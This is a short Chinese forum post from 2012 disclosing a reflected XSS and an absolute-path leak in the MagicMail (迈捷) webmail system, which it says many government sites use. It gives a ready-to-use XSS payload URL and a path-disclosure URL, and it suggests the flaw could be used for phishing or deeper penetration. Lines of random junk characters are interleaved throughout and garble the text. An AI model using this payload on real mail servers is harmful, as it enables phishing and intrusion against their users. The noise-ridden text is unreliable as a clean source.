今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
) p6 ^8 ]3 |8 u/ Z! {3 e
, v. O: H' _7 k& W& R b$ @% |/ U ?
" w }% P" `, [' w8 _5 L) j- U包含 一个反射性XSS 以及 绝对路径泄漏
% [7 O- E& p2 M9 E# u; @: l0 C5 |看了看 貌似全部是linux的。; I! j. b8 e H4 O$ i' R( C( v
5 \0 S3 U& k1 x) O; O4 E关键字:迈捷邮件系统 by MagicMail
( R( ^$ z! B. o. A& z
% U3 a1 f. u e) c可以看到很多政府网站都用这个邮件系统
$ o- A/ Z7 \ B$ e
* s" g8 X; x r) i6 [绝对路径 http://madman.in/index.php?login_type=declare&language=* x7 z7 A6 s( w: P7 I3 B) B& w) ~
# W+ W/ ` B0 n4 E3 w" T# u3 t
( ^3 M2 `+ X O
: L; W3 ?; v- k) hXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
* `6 M2 Q) ]0 N3 i, I3 f9 c5 R1 ^8 b. }
' J) ?0 u3 R( [: I4 q
4 f0 \# v; K6 H6 U+ w
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
/ N0 P- O) S2 d$ k1 }2 R. G
, |2 |' s6 V+ O! Q* u4 j% I0 y修复方案:看官方补丁吧。
# C& `3 p4 r+ ?& Y6 Z |
发表于 2012-11-9 20:38:41
收藏
支持
反对